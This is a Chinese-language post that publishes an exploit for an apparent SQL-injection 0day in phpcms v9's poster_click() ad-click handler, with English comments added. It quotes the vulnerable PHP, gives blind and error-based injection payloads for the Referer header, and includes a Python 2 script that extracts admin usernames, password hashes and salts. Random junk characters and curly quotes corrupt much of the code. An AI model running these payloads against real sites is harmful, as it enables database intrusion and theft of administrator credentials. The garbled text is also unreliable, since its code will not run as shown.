有人放出了 phpcms v9 的 0day,就随手写了个利用代码,其中注入代码有两种形式:
问题函数:\phpcms\modules\poster\index.php
// Ad-click endpoint: looks up the poster row by id, logs the click, bumps the
// click counter and redirects the browser to the configured link URL.
// Security notes, from reading this function alone:
//  - The click-log insert below receives HTTP_REFERER and the 'username'
//    cookie value as-is. No escaping is visible in this function, and this
//    page reports that the DB layer does not escape them either; that is the
//    SQL-injection path discussed above. Hardening: escape/parameterize in
//    the s_db insert path, or validate and length-limit these values here.
//  - In the else branch $_GET['url'] becomes the Location header unchecked:
//    open-redirect exposure; restrict it to the configured linkurl values.
$ @$ G3 b. y( o* i. Epublic function poster_click() {$ z# u7 x7 w* y
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;6 R5 l6 W$ ]' E4 x) I3 L
$r = $this->db->get_one(array('id'=>$id));5 `( x$ B; s6 `+ O( m( ~) ]: }
// Abort when the lookup returned a non-array, empty value (no such row).
if (!is_array($r) && empty($r)) return false;
. W: m* D' [# B t) H( k& @$ip_area = pc_base::load_sys_class('ip_area'); U2 ^. L- G1 F N. e
// The doubled ';' is a harmless empty statement — possibly a paste artifact.
$ip = ip();; v. l) M f* S' B# v. Y- b+ L
$area = $ip_area->get($ip);
// Untrusted: taken straight from a client-controlled cookie.
/ l1 F- ]3 }/ }! Z3 ]. q. ?5 D$username = param::get_cookie('username') ? param::get_cookie('username') : '';
! C: d; l, ~; f% mif($id) {
5 @# s2 `/ K0 V% p" U$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
// Untrusted columns in this row: 'username' (cookie) and 'referer' (HTTP_REFERER).
. @3 ?% [3 Z) s3 h% w! ?$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
4 d$ S) X' [% [ v}4 q7 Z4 b/ P/ N$ A: C) p9 H
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
f. E, R7 B2 q5 j' P2 l$setting = string2array($r['setting']);
@1 u# O! C# ^& y2 E! L3 s9 Xif (count($setting)==1) {
6 Z" Q9 T4 y8 R' _; \4 R$url = $setting['1']['linkurl'];
/ G6 n$ I4 W4 X: ]" u( ~- u} else {/ M$ ~% U7 K7 ]: y7 J
// Untrusted redirect target whenever more than one setting entry exists.
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];8 G: c R; ^; e) {
}
) U6 O# W2 p& r# D8 cheader('Location: '.$url);
! e) f' i7 U) P}+ S6 v5 h0 p8 P9 W
利用方式:
1、可以采用盲注入的手法:
0 v* \4 I: i) Preferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
通过返回页面正常与否,一个个猜解密码字段。
2、代码是花开写的,随手附上了:
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
此方法是报错注入手法,原理自查。
利用程序:
#!/usr/bin/env python
+ _3 J$ u! f4 m% L3 l- i4 f- U7 Himport httplib,sys,re
# Exploit client for the poster_click() injection shown above: the SQL
# payload rides in the HTTP Referer header, which poster_click() writes into
# the click-log row (the 'referer' column) and which this page reports is not
# escaped on the way in.  Written for Python 2 (print statements, httplib);
# the curly quotes are an extraction artifact, not code.
# Defender view: the observable indicator is a Referer header carrying SQL
# (SELECT ... information_schema ... group by) on a request to
# m=poster&c=index&a=poster_click, and the extraction only succeeds when the
# server echoes the MySQL "Duplicate entry" error text into the response body,
# so suppressing DB error output in responses blunts this variant.
/ H( l- G: p2 a& R$ F$ Edef attack():# I3 \) R, }" Z k: @ t+ c
print “Code by Pax.Mac Team conqu3r!”6 _9 m/ y G7 h5 o) t
print “Welcome to our zone!!!”, V O$ E% X+ v
# argv[1] is the host, argv[2] the site's base path (see the usage text in __main__).
url=sys.argv[1]) P2 \+ n l' B1 e/ l7 Q
paths=sys.argv[2]+ l1 i1 K4 T" F$ {
conn = httplib.HTTPConnection(url)7 M. g( |) U5 v( M+ W
# The Referer value is the error-based payload from the "利用方式" section, verbatim.
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
3 P c4 B* k. ?8 \“Accept”: “text/plain”,
! u# K6 }8 G6 B; t/ }5 f“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
# No try/finally: if request()/getresponse() raises, conn.close() below is skipped.
# A8 b; \' ?& Gconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)/ ]6 N: z; O0 A; _+ [! C1 Q) Z' u W
r1 = conn.getresponse()" ^- N1 B& @+ m7 K) J' J1 z
datas=r1.read()- h* f( z0 D- g
# Pulls the leaked value out of the MySQL duplicate-key error text.  If the
# target is patched or hides DB errors, findall() returns [] and the
# datas[0] below raises IndexError instead of reporting "not vulnerable".
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
; `1 j: b4 } oprint datas[0]
- r6 [. A( w& c4 y, d: u% Rconn.close()& K% U9 H+ r+ R' t0 _4 B
# Entry point: requires host and base path on the command line (argv[1],
# argv[2]), otherwise prints usage and exits with status 1.
if __name__==”__main__”:* ]" p( c0 r5 e) r# d+ h# @
if len(sys.argv)<3:: V. P0 A2 W& M2 r# M
print “Code by Pax.Mac Team conqu3r”8 C+ P) _% f) N5 T$ a
# "Usgae" and the inconsistent script name in the two examples are typos in
# the original output strings; left as-is because they are runtime text.
print “Usgae:”
, t7 H4 G4 E3 `5 _1 Pprint “ phpcmsattack.py www.paxmac.org /”+ \' r9 v% F* S8 L
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”1 U1 T c, q! U+ ?: x" {
sys.exit(1)
) G/ `1 y+ p9 {9 O* H! tattack()